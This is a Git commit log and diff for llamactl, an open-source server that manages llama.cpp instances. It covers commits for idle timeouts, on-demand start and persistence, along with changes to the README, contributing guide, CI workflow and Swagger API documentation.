70 Commits

Author SHA1 Message Date
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
5aed01b68f Merge pull request #17 from lordmathis/fix/forbidden-logs
fix: Refactor log fetching to use instancesApi
2025-08-06 19:12:34 +02:00
3f9caff33b Refactor log fetching to use instancesApi 2025-08-06 19:07:25 +02:00
169254c61a Merge pull request #16 from lordmathis/fix/llama-server-options
fix: Missing or wrong llama server options
2025-08-06 18:51:18 +02:00
8154b8d0ab Fix temp in tests 2025-08-06 18:49:36 +02:00
a26d853ad5 Fix missing or wrong llama server options on frontend 2025-08-06 18:40:05 +02:00
6203b64045 Fix missing or wrong llama server options 2025-08-06 18:31:17 +02:00
8d9c808be1 Merge pull request #14 from lordmathis/docs/readme-updates
docs: Update README.md to improve project description
2025-08-05 21:32:20 +02:00
161cd213c5 Update README.md to enhance project description and installation instructions 2025-08-05 21:20:37 +02:00
d6e84f0527 Merge pull request #13 from lordmathis/fix/decimal-input
fix: Allow decimal input for numeric fields in instance configuration
2025-08-05 20:03:31 +02:00
0846350d41 Fix eslint issues in ZodFormField 2025-08-05 19:21:09 +02:00
dacaca8594 Fix number input handling to allow decimal values 2025-08-05 19:15:12 +02:00
6e3f5cec61 Merge pull request #12 from lordmathis/refactor/pkg-restructure
Pkg restructure
2025-08-04 20:48:18 +02:00
85b3638efb Update ValidateInstanceName to return the validated name and modify tests accordingly 2025-08-04 20:46:15 +02:00
934d1c5aaa Refactor instance management by moving operations to a new file 2025-08-04 20:38:57 +02:00
2abe9c282e Rename config and instance struct to avoid awkward naming 2025-08-04 19:30:50 +02:00
6a7a9a2d09 Split large package into subpackages 2025-08-04 19:23:56 +02:00
a3c44dad1e Merge pull request #11 from lordmathis/feat/state-persistance
feat: Persist instances configs across app restarts
2025-08-02 23:47:35 +02:00
7426008ef9 Use instance directly in DeleteInstance 2025-08-02 23:35:03 +02:00
cf26aa521a Update README.md to enhance API Key authentication section and provide usage examples 2025-08-02 23:15:25 +02:00
d94c922314 Update README.md for data persistence features 2025-08-02 23:02:30 +02:00
3cbd23a6e2 Implement persistence tests 2025-08-02 22:52:50 +02:00
bed172bf73 Implement instance loading and auto-start functionality on manager initialization 2025-08-02 21:39:19 +02:00
d449255bc9 Persist instance state after starting and stopping instances 2025-08-02 21:23:31 +02:00
de89d0673a Implement instance persistence with JSON file storage and deletion 2025-08-02 21:09:16 +02:00
dd6ffa548c Refactor configuration structure to replace DataConfig with instance-specific directories and auto-creation options 2025-08-02 19:10:40 +02:00
7935f19cc1 Add data directory configuration with auto-creation option 2025-08-02 15:33:33 +02:00
f1718198a3 Merge pull request #10 from lordmathis/fix/graceful-shutdown
Implement graceful shutdown
2025-08-01 23:44:58 +02:00
b24d744cad Implement graceful shutdown for the server and add Shutdown method to InstanceManager 2025-08-01 23:41:18 +02:00
fff8b2dbde Merge pull request #9 from lordmathis/docs/add-prebuilt-install-instructions
Update installation instructions in README.md to include prebuilt binaries
2025-08-01 20:23:54 +02:00
b94909dee4 Update installation instructions in README.md to include prebuilt binaries and manual download steps 2025-08-01 20:17:29 +02:00
47 changed files with 2745 additions and 1721 deletions

View File

@@ -29,6 +29,8 @@ jobs:
npm ci
- name: Build Web UI
env:
VITE_APP_VERSION: ${{ github.ref_name }}
run: |
cd webui
npm run build

1
CNAME Normal file
View File

@@ -0,0 +1 @@
llamactl.org

138
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,138 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

320
README.md
View File

@@ -2,93 +2,159 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
A control server for managing multiple Llama Server instances with a web-based dashboard.
**Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
## Features
## Why llamactl?
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
- **Web Dashboard**: Modern React-based UI for managing instances
- **Auto-restart**: Configurable automatic restart on instance failure
- **Instance Monitoring**: Real-time health checks and status monitoring
- **Log Management**: View, search, and download instance logs
- **REST API**: Full API for programmatic control
- **OpenAI Compatible**: Route requests to instances by instance name
- **Configuration Management**: Comprehensive llama-server parameter support
- **System Information**: View llama-server version, devices, and help
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Idle Timeout Management**: Automatically stop idle instances after a configurable period
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Prerequisites
![Dashboard Screenshot](docs/images/screenshot.png)
This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
**Install llama.cpp:**
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
## Quick Start
```bash
# 1. Install llama-server (one-time setup)
# See: https://github.com/ggml-org/llama.cpp#quick-start
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```
## Usage
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Set model path and GPU layers
4. Start or stop the instance
### Or use the REST API:
```bash
# Create instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```
## Installation
### Build Requirements
- Go 1.24 or later
- Node.js 22 or later (for building the web UI)
### Building with Web UI
### Option 1: Download Binary (Recommended)
```bash
# Clone the repository
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Install Node.js dependencies
cd webui
npm ci
# Build the web UI
npm run build
# Return to project root and build
cd ..
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
# Run the server
./llamactl
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Quick install methods:
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
```
## Configuration
llamactl works out of the box with sensible defaults.
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
<details><summary><strong>Full Configuration Guide</strong></summary>
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
1. Hardcoded defaults
2. Configuration file
3. Environment variables
```
Defaults < Configuration file < Environment variables
```
### Configuration Files
Configuration files are searched in the following locations:
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `~/.config/llamactl/config.yaml`
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
## API Key Authentication
llamactl now supports API Key authentication for both management and inference (OpenAI-compatible) endpoints. The are separate keys for management and inference APIs. Management keys grant full access; inference keys grant access to OpenAI-compatible endpoints
**How to Use:**
- Pass your API key in requests using one of:
- `Authorization: Bearer <key>` header
- `X-API-Key: <key>` header
- `api_key=<key>` query parameter
**Auto-generated keys**: If no keys are set and authentication is required, a key will be generated and printed to the terminal at startup. For production, set your own keys in config or environment variables.
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
@@ -112,25 +178,38 @@ server:
```yaml
instances:
port_range: [8000, 9000] # Port range for instances
log_directory: "/tmp/llamactl" # Directory for instance logs
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_LOG_DIR` - Log directory path
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
#### Auth Configuration
#### Authentication Configuration
```yaml
auth:
@@ -146,121 +225,8 @@ auth:
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
### Example Configuration
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8001, 8100]
log_directory: "/var/log/llamactl"
max_instances: 10
llama_executable: "/usr/local/bin/llama-server"
default_auto_restart: true
default_max_restarts: 5
default_restart_delay: 10
auth:
require_inference_auth: true
inference_keys: ["sk-inference-abc123"]
require_management_auth: true
management_keys: ["sk-management-xyz456"]
```
## Usage
### Starting the Server
```bash
# Start with default configuration
./llamactl
# Start with custom config file
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
# Start with environment variables
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
```
### Web Dashboard
Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
### API Usage
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
#### Create an Instance
```bash
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"model": "/path/to/model.gguf",
"gpu_layers": 32,
"auto_restart": true
}'
```
#### List Instances
```bash
curl http://localhost:8080/api/v1/instances
```
#### Start/Stop Instance
```bash
# Start
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
# Stop
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
```
### OpenAI Compatible Endpoints
Route requests to instances by including the instance name as the model parameter:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-instance",
"messages": [{"role": "user", "content": "Hello!"}]
}'
```
## Development
### Running Tests
```bash
# Go tests
go test ./...
# Web UI tests
cd webui
npm test
```
### Development Server
```bash
# Start Go server in development mode
go run ./cmd/server
# Start web UI development server (in another terminal)
cd webui
npm run dev
```
## API Documentation
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
</details>
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
MIT License - see [LICENSE](LICENSE) file.

View File

@@ -1,5 +1,5 @@
// Package docs Code generated by swaggo/swag. DO NOT EDIT
package docs
// Package apidocs Code generated by swaggo/swag. DO NOT EDIT
package apidocs
import "github.com/swaggo/swag"
@@ -37,7 +37,7 @@ const docTemplate = `{
"schema": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
}
},
@@ -75,7 +75,7 @@ const docTemplate = `{
"200": {
"description": "Instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -120,7 +120,7 @@ const docTemplate = `{
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -128,7 +128,7 @@ const docTemplate = `{
"200": {
"description": "Updated instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -173,7 +173,7 @@ const docTemplate = `{
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -181,7 +181,7 @@ const docTemplate = `{
"201": {
"description": "Created instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -401,7 +401,7 @@ const docTemplate = `{
"200": {
"description": "Restarted instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -444,7 +444,7 @@ const docTemplate = `{
"200": {
"description": "Started instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -487,7 +487,7 @@ const docTemplate = `{
"200": {
"description": "Stopped instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -639,7 +639,35 @@ const docTemplate = `{
"200": {
"description": "List of OpenAI-compatible instances",
"schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
"$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
@@ -653,7 +681,7 @@ const docTemplate = `{
}
},
"definitions": {
"llamactl.CreateInstanceOptions": {
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
@@ -751,7 +779,6 @@ const docTemplate = `{
"type": "string"
},
"draft_max": {
"description": "Speculative decoding params",
"type": "integer"
},
"draft_min": {
@@ -955,7 +982,7 @@ const docTemplate = `{
"type": "boolean"
},
"no_context_shift": {
"description": "Server/Example-specific params",
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
@@ -1027,10 +1054,10 @@ const docTemplate = `{
"presence_penalty": {
"type": "number"
},
"priority": {
"prio": {
"type": "integer"
},
"priority_batch": {
"prio_batch": {
"type": "integer"
},
"props": {
@@ -1101,7 +1128,7 @@ const docTemplate = `{
"ssl_key_file": {
"type": "string"
},
"temperature": {
"temp": {
"type": "number"
},
"tensor_split": {
@@ -1167,7 +1194,7 @@ const docTemplate = `{
}
}
},
"llamactl.Instance": {
"instance.Process": {
"type": "object",
"properties": {
"created": {
@@ -1183,7 +1210,7 @@ const docTemplate = `{
}
}
},
"llamactl.OpenAIInstance": {
"server.OpenAIInstance": {
"type": "object",
"properties": {
"created": {
@@ -1200,13 +1227,13 @@ const docTemplate = `{
}
}
},
"llamactl.OpenAIListInstancesResponse": {
"server.OpenAIListInstancesResponse": {
"type": "object",
"properties": {
"data": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.OpenAIInstance"
"$ref": "#/definitions/server.OpenAIInstance"
}
},
"object": {

View File

@@ -30,7 +30,7 @@
"schema": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
}
},
@@ -68,7 +68,7 @@
"200": {
"description": "Instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -113,7 +113,7 @@
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -121,7 +121,7 @@
"200": {
"description": "Updated instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -166,7 +166,7 @@
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -174,7 +174,7 @@
"201": {
"description": "Created instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -394,7 +394,7 @@
"200": {
"description": "Restarted instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -437,7 +437,7 @@
"200": {
"description": "Started instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -480,7 +480,7 @@
"200": {
"description": "Stopped instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -632,7 +632,35 @@
"200": {
"description": "List of OpenAI-compatible instances",
"schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
"$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
@@ -646,7 +674,7 @@
}
},
"definitions": {
"llamactl.CreateInstanceOptions": {
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
@@ -744,7 +772,6 @@
"type": "string"
},
"draft_max": {
"description": "Speculative decoding params",
"type": "integer"
},
"draft_min": {
@@ -948,7 +975,7 @@
"type": "boolean"
},
"no_context_shift": {
"description": "Server/Example-specific params",
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
@@ -1020,10 +1047,10 @@
"presence_penalty": {
"type": "number"
},
"priority": {
"prio": {
"type": "integer"
},
"priority_batch": {
"prio_batch": {
"type": "integer"
},
"props": {
@@ -1094,7 +1121,7 @@
"ssl_key_file": {
"type": "string"
},
"temperature": {
"temp": {
"type": "number"
},
"tensor_split": {
@@ -1160,7 +1187,7 @@
}
}
},
"llamactl.Instance": {
"instance.Process": {
"type": "object",
"properties": {
"created": {
@@ -1176,7 +1203,7 @@
}
}
},
"llamactl.OpenAIInstance": {
"server.OpenAIInstance": {
"type": "object",
"properties": {
"created": {
@@ -1193,13 +1220,13 @@
}
}
},
"llamactl.OpenAIListInstancesResponse": {
"server.OpenAIListInstancesResponse": {
"type": "object",
"properties": {
"data": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.OpenAIInstance"
"$ref": "#/definitions/server.OpenAIInstance"
}
},
"object": {

View File

@@ -1,6 +1,6 @@
basePath: /api/v1
definitions:
llamactl.CreateInstanceOptions:
instance.CreateInstanceOptions:
properties:
alias:
type: string
@@ -66,7 +66,6 @@ definitions:
device_draft:
type: string
draft_max:
description: Speculative decoding params
type: integer
draft_min:
type: integer
@@ -203,7 +202,7 @@ definitions:
no_cont_batching:
type: boolean
no_context_shift:
description: Server/Example-specific params
description: Example-specific params
type: boolean
no_escape:
type: boolean
@@ -251,9 +250,9 @@ definitions:
type: integer
presence_penalty:
type: number
priority:
prio:
type: integer
priority_batch:
prio_batch:
type: integer
props:
type: boolean
@@ -301,7 +300,7 @@ definitions:
type: string
ssl_key_file:
type: string
temperature:
temp:
type: number
tensor_split:
type: string
@@ -345,7 +344,7 @@ definitions:
yarn_orig_ctx:
type: integer
type: object
llamactl.Instance:
instance.Process:
properties:
created:
description: Creation time
@@ -356,7 +355,7 @@ definitions:
description: Status
type: boolean
type: object
llamactl.OpenAIInstance:
server.OpenAIInstance:
properties:
created:
type: integer
@@ -367,11 +366,11 @@ definitions:
owned_by:
type: string
type: object
llamactl.OpenAIListInstancesResponse:
server.OpenAIListInstancesResponse:
properties:
data:
items:
$ref: '#/definitions/llamactl.OpenAIInstance'
$ref: '#/definitions/server.OpenAIInstance'
type: array
object:
type: string
@@ -393,7 +392,7 @@ paths:
description: List of instances
schema:
items:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
type: array
"500":
description: Internal Server Error
